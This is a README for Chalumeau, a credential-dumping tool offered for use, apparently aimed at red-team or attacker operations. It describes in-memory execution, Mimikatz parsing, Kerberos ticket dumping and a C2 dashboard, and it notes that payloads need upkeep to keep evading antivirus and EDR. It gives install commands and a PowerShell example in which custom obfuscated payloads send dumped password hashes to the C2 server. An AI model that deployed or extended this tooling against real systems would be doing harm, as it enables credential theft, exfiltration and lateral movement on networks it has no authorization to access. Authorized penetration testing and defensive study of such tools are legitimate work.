Chalumeau : Automated, Extendable & Customizable Credential Dumping Tool

Chalumeau is automated,extendable and customizable credential dumping tool based on powershell and python.

Main Features

• Write your own Payloads
• In-Memory execution
• Extract Password List
• Dashboard reporting / Web Interface
• Parsing Mimikatz
• Dumping Tickets

Known Issues

• Parsing Mimikatz dcsync (working on fix)
• Bypassing Antivirus and EDRs , you will need to maintain your payloads

To Do

• Encrypted Communication
• Automated Lateral movement
• Automated Password Spraying
• Automated Hash Cracking

Using

git clone https://github.com/cyberstruggle/chalumeau.git
cd chalumeau/
chmod +x install.sh
sudo ./install.sh

#Run
chmod +x start.sh

sudo ./start.sh

Write Your Own Payload

obfuscate your own powershell payload for dumping credentials and use chalumeau function call without any imports chalumeau will Encrypt and contact with the c2 and sending the dumped credentials. just save the file under chalumeau-power/payloads

• Using ChalumeauSendCredentials Function
  • ChalumeauSendCredentials
    • Secret = the dumped hash or clear text password (string)
    • Username = the username of id of the dumped credential (string)
    • IsClearText = 1 if it’s clear text 0 if it’s not (int)
    • Source = mention the Source payload like “Mimikatz Hash” (string)

# Custom Payload Example
# $DumpedHashes is array of dumped hashes from the local machine
foreach ($hash in $DumpedHashes){
ChalumeauSendCredentials -Secret $hash.secret -Username $hash.user -IsClearText 0 -source “My custom payload”
}

Credits

• wazehell Author
• Invoke-Obfuscation Daniel Bohannon
• Invoke-Mimikatz PowerSploit
• Get-PassHashes nishang
• Chalumeau Logo Aureliano
• Invoke-MassMimikatz PowerTools